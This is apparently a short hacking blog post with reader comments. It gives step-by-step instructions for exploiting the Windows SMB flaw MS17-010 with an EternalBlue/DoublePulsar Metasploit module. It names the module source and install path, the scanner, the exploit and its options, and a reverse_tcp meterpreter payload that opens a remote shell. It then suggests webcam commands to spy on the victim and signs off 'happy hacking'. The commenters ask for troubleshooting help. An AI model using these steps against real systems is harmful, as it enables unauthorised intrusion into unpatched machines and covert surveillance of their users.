Eternalblue and Doublepulsar with Metasploit

Just wanna share it..

I'm using this msf module https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.

Clone it and copy paste eternalblue_doublepulsar.rb to /usr/share/metasploit-framework/modules/exploits/windows/smb/.



Run msfconsole and scan your local network with auxiliary/scanner/smb/smb_ms17_010 (MS17-010 SMB RCE Detection).



Now use the exploit exploit/windows/smb/eternalblue_doublepulsar.
Set the necessary options like RHOST, TARGETARCHITECTURE, TARGET and PROCESSINJECT.
For DOUBLEPULSARPATH and ETERNALBLUEPATH, use Eternalblue-Doublepulsar-Metasploit/deps/ directory. For example /root/Eternalblue-Doublepulsar-Metasploit/deps/.
Don't forget set the PAYLOAD windows/x64/meterpreter/reverse_tcp (my target use x64 so i'm using x64 payload too).

 

If everything sets, now run exploit.




Run some interesting command like webcam_list or webcam_snap

 



The victim desktop screenshot.

 

Tested on my local network, tool used Metasploit running in Kali Linux.
Thats it, happy hacking!

2 Responses so far.

  1. Hello, i did "dpkg --add-architecture i386 && apt-get update && apt-get install wine32" and stuck in boot loop after reboot (enter root, password, press login, but it went back to login screen), i am running kali 2016.2, what can i do ?



  2. i got this error in metasploit? what im i doing wrong ? i moved the filles to the directory as shown in the video.
    sh: 1: cd: can't cd to /root/Eternalblue-Doublepulsar-Metasploit/deps/
    wine: cannot find L"C:\\windows\\system32\\Eternalblue-2.2.0.exe"